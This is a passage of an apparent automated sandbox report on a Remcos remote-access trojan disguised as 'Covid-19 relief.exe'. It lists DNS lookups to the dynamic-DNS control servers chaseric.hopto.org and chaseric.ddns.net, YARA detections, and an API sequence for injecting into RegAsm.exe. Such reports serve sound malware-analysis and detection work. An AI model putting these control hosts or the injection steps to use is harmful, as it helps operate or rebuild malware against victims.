                                Nov 18, 2020 14:55:26.855314970 CET53592608.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:29.603147030 CET4994453192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:29.642263889 CET53499448.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:31.296330929 CET6330053192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:31.331573963 CET53633008.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:33.470700979 CET6144953192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:33.497668028 CET53614498.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:33.677052021 CET5127553192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:33.712356091 CET53512758.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:33.929867983 CET6349253192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:33.965612888 CET53634928.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:35.634967089 CET5894553192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:35.670609951 CET53589458.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:37.133745909 CET6077953192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:37.170603991 CET53607798.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:38.243334055 CET6401453192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:38.278871059 CET53640148.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:39.828010082 CET5709153192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:39.863558054 CET53570918.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:42.414829969 CET5590453192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:42.450323105 CET53559048.8.8.8192.168.2.4
                                Nov 18, 2020 14:56:09.813433886 CET5210953192.168.2.48.8.8.8
                                Nov 18, 2020 14:56:09.840454102 CET53521098.8.8.8192.168.2.4
                                Nov 18, 2020 14:56:11.697805882 CET5445053192.168.2.48.8.8.8
                                Nov 18, 2020 14:56:11.725682020 CET53544508.8.8.8192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Nov 18, 2020 14:54:38.182744980 CET192.168.2.48.8.8.80x23d7Standard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)
                                Nov 18, 2020 14:54:59.324421883 CET192.168.2.48.8.8.80xdceStandard query (0)chaseric.ddns.netA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:09.630620003 CET192.168.2.48.8.8.80x295fStandard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:11.723577023 CET192.168.2.48.8.8.80x4679Standard query (0)chaseric.ddns.netA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:14.438481092 CET192.168.2.48.8.8.80xfa28Standard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:16.125231028 CET192.168.2.48.8.8.80x8b55Standard query (0)chaseric.ddns.netA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:18.678056955 CET192.168.2.48.8.8.80x63cfStandard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:20.255029917 CET192.168.2.48.8.8.80x3669Standard query (0)chaseric.ddns.netA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:25.147579908 CET192.168.2.48.8.8.80x57daStandard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:26.819869041 CET192.168.2.48.8.8.80x144dStandard query (0)chaseric.ddns.netA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:29.603147030 CET192.168.2.48.8.8.80xf9ceStandard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:31.296330929 CET192.168.2.48.8.8.80xdde9Standard query (0)chaseric.ddns.netA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:33.929867983 CET192.168.2.48.8.8.80x3907Standard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:35.634967089 CET192.168.2.48.8.8.80xd864Standard query (0)chaseric.ddns.netA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:38.243334055 CET192.168.2.48.8.8.80xc968Standard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:39.828010082 CET192.168.2.48.8.8.80x280Standard query (0)chaseric.ddns.netA (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:42.414829969 CET192.168.2.48.8.8.80xed78Standard query (0)chaseric.hopto.orgA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Nov 18, 2020 14:54:38.219892025 CET8.8.8.8192.168.2.40x23d7No error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:54:59.361639977 CET8.8.8.8192.168.2.40xdceNo error (0)chaseric.ddns.net194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:09.666126966 CET8.8.8.8192.168.2.40x295fNo error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:11.760684013 CET8.8.8.8192.168.2.40x4679No error (0)chaseric.ddns.net194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:14.465570927 CET8.8.8.8192.168.2.40xfa28No error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:16.160991907 CET8.8.8.8192.168.2.40x8b55No error (0)chaseric.ddns.net194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:18.715112925 CET8.8.8.8192.168.2.40x63cfNo error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:20.291959047 CET8.8.8.8192.168.2.40x3669No error (0)chaseric.ddns.net194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:25.183108091 CET8.8.8.8192.168.2.40x57daNo error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:26.855314970 CET8.8.8.8192.168.2.40x144dNo error (0)chaseric.ddns.net194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:29.642263889 CET8.8.8.8192.168.2.40xf9ceNo error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:31.331573963 CET8.8.8.8192.168.2.40xdde9No error (0)chaseric.ddns.net194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:33.965612888 CET8.8.8.8192.168.2.40x3907No error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:35.670609951 CET8.8.8.8192.168.2.40xd864No error (0)chaseric.ddns.net194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:38.278871059 CET8.8.8.8192.168.2.40xc968No error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:39.863558054 CET8.8.8.8192.168.2.40x280No error (0)chaseric.ddns.net194.5.97.21A (IP address)IN (0x0001)
                                Nov 18, 2020 14:55:42.450323105 CET8.8.8.8192.168.2.40xed78No error (0)chaseric.hopto.org194.5.97.21A (IP address)IN (0x0001)

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: Covid-19 relief.exe PID: 5676 Parent PID: 5820

                                General

                                Start time:14:54:33
                                Start date:18/11/2020
                                Path:C:\Users\user\Desktop\Covid-19 relief.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Covid-19 relief.exe'
                                Imagebase:0x310000
                                File size:560640 bytes
                                MD5 hash:5DD2C165636EFF7F866E18370351101E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, Author: unknown
                                Reputation:low

                                Chronological Activities

                                Analysis Process: RegAsm.exe PID: 5568 Parent PID: 5676

                                General

                                Start time:14:54:37
                                Start date:18/11/2020
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Imagebase:0x970000
                                File size:64616 bytes
                                MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: Covid-19 relief.exe PID: 1320 Parent PID: 5676

                                General

                                Start time:14:54:38
                                Start date:18/11/2020
                                Path:C:\Users\user\Desktop\Covid-19 relief.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\Covid-19 relief.exe'
                                Imagebase:0x350000
                                File size:560640 bytes
                                MD5 hash:5DD2C165636EFF7F866E18370351101E
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                Chronological Activities

                                Analysis Process: RegAsm.exe PID: 5976 Parent PID: 1320

                                General

                                Start time:14:54:43
                                Start date:18/11/2020
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Imagebase:0x3c0000
                                File size:64616 bytes
                                MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Chronological Activities

                                Analysis Process: RegAsm.exe PID: 4584 Parent PID: 1320

                                General

                                Start time:14:54:43
                                Start date:18/11/2020
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Imagebase:0xb40000
                                File size:64616 bytes
                                MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                Reputation:moderate

                                Chronological Activities

                                Disassembly

                                Code Analysis

                                Reset < >

                                  Analysis Process: Covid-19 relief.exe PID: 5676 Parent PID: 5820 Covid-19 relief.exeCOMMON

                                  Executed Functions

                                  Function 057B01CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.926919557.00000000057B0000.00000040.00000001.sdmp, Offset: 057B0000, based on PE: false
                                  Similarity
                                  • API ID: Section$OpenView
                                  • String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
                                  • API String ID: 2380476227-789266925
                                  • Opcode ID: 62f96461c8ecb572473f998a272c8d50221bd415e6440be668470d52ab82c26e
                                  • Instruction ID: a61e5d55fba0536f28f0ba3107ea069eccfe1dc718b15d44c15f2632783fd39d
                                  • Opcode Fuzzy Hash: 62f96461c8ecb572473f998a272c8d50221bd415e6440be668470d52ab82c26e
                                  • Instruction Fuzzy Hash: 28D2B0B1C0526C8ADF21DFA18D89BCEBBB8BF15701F1081DAD148AB215EB719B84CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 057B1C09, Relevance: 15.2, APIs: 10, Instructions: 225nativethreadprocessCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 057B1CB7
                                  • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 057B1CDC
                                  • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 057B1CF6
                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 057B1D41
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 057B1D66
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 057B1DA9
                                  • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 057B1E36
                                  • NtGetContextThread.NTDLL(?,?), ref: 057B1E50
                                  • NtSetContextThread.NTDLL(?,00010007), ref: 057B1E74
                                  • NtResumeThread.NTDLL(?,00000000), ref: 057B1E86
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.926919557.00000000057B0000.00000040.00000001.sdmp, Offset: 057B0000, based on PE: false
                                  Similarity
                                  • API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
                                  • String ID:
                                  • API String ID: 3307612235-0
                                  • Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                  • Instruction ID: c913836d572792ca48888be11c4babccb006efefb54af16f4eba4d23c3617d61
                                  • Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                  • Instruction Fuzzy Hash: DD91E271900248ABEF21DFA5CC88EEEBBB8FF49705F404059FA09EA150D771AA54DB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 057B00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtOpenSection.NTDLL(?,0000000C,?), ref: 057B0199
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 057B01B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.926919557.00000000057B0000.00000040.00000001.sdmp, Offset: 057B0000, based on PE: false
                                  Similarity
                                  • API ID: Section$OpenView
                                  • String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
                                  • API String ID: 2380476227-2634024955
                                  • Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                  • Instruction ID: 2559dd1f8ab27f22f7835ec441c86e79fea5c84e442843e2dcd37b8bc028c8c0
                                  • Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                  • Instruction Fuzzy Hash: 673102B1A1025CAFCB10CFE4C889BDEBBB8FF08750F10415AE514AB250E7B49A05CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C3925D, Relevance: 1.6, APIs: 1, Instructions: 106fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteFileA.KERNELBASE(?), ref: 00C39357
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 06dd3d9cf48fc4b6c3cedd39a4361c2855d2360c29f03f1ee666cd28c61a848a
                                  • Instruction ID: 6a314bab0203d613174d2377cb7a633b5540b104423f54473da195fb580026ea
                                  • Opcode Fuzzy Hash: 06dd3d9cf48fc4b6c3cedd39a4361c2855d2360c29f03f1ee666cd28c61a848a
                                  • Instruction Fuzzy Hash: 554176B0D106188FDB50CFA9C8857DEBBF1EF48304F148129E815AB394D7B89986CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C377A4, Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteFileA.KERNELBASE(?), ref: 00C39357
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: a35ba97f4e49007436d342448b2ba8427781bde4cfdbbc02975463b639731a90
                                  • Instruction ID: e03e8fc50b24a10435e6345f5d68c9f093ace2f52196513acee74b0f6e2af219
                                  • Opcode Fuzzy Hash: a35ba97f4e49007436d342448b2ba8427781bde4cfdbbc02975463b639731a90
                                  • Instruction Fuzzy Hash: 0A4136B0D106188FDB50CFA9C8857DEBBF1EB48314F148129E815AB394D7B8A885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C39411, Relevance: 1.5, APIs: 1, Instructions: 236memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00C39698
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f821fb9b41b99fe2a7de14141193f3017c660670dbf0d5789cce2a2b205e3f70
                                  • Instruction ID: 17301fa199a4573b4787f032e60b06b97d6bfcc268ffd4895b9d67a879d98e3e
                                  • Opcode Fuzzy Hash: f821fb9b41b99fe2a7de14141193f3017c660670dbf0d5789cce2a2b205e3f70
                                  • Instruction Fuzzy Hash: 34810170A042048FCB10DBB9C494BAEBBF2EF89314F14856DD51A9B382DBB5DC42CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C39630, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00C39698
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: cd4d611f66111a1107091f3db2b8219542db3715fa210099009ec789bbf9d46a
                                  • Instruction ID: e63665924719b0b33767fe2f462efe31e2dd5b824fb18949b7a2065a715f87fa
                                  • Opcode Fuzzy Hash: cd4d611f66111a1107091f3db2b8219542db3715fa210099009ec789bbf9d46a
                                  • Instruction Fuzzy Hash: A011E6B59002099FDB10DF9AD844BDEFBF4FB48324F148429E529A7210D7B5A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00C304DF, Relevance: .3, Instructions: 270COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecc35d52104873a39c3e55fdd570d4780173e709bcf150a1e38aaf288f0eb10d
                                  • Instruction ID: 590bd5333be02a19761b0f87c0e902557164e6c93a6754b73071c9007e9c022b
                                  • Opcode Fuzzy Hash: ecc35d52104873a39c3e55fdd570d4780173e709bcf150a1e38aaf288f0eb10d
                                  • Instruction Fuzzy Hash: 6CD1F831C2475A8ADB10EF64C860A9DB3B1FFD6300F50CB9AE50977265EB706AC8CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C304F0, Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ccaae231152855b69928314277769e1d11827a81ab0f58d7ced3cfcea4d08cd
                                  • Instruction ID: 9943d10419e9d0224b65ef209c159482787d3b82d3721546d3d2fd5d8f40d53d
                                  • Opcode Fuzzy Hash: 7ccaae231152855b69928314277769e1d11827a81ab0f58d7ced3cfcea4d08cd
                                  • Instruction Fuzzy Hash: C2D1E731C2075A8ADB10EF65C960A9DB3B1FFD5300F50CB9AE50977265EB706AC8CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: RegAsm.exe PID: 5568 Parent PID: 5676 RegAsm.exeCOMMON

                                  Executed Functions

                                  Function 0040D2A6, Relevance: 210.9, APIs: 117, Strings: 3, Instructions: 868sleepfilenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D2BC
                                  • SetEvent.KERNEL32(?), ref: 0040D2C5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CE
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040D2E8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040D2F9
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D308
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • GetTickCount.KERNEL32 ref: 0040D33C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,?,?,00000000), ref: 0040D39C
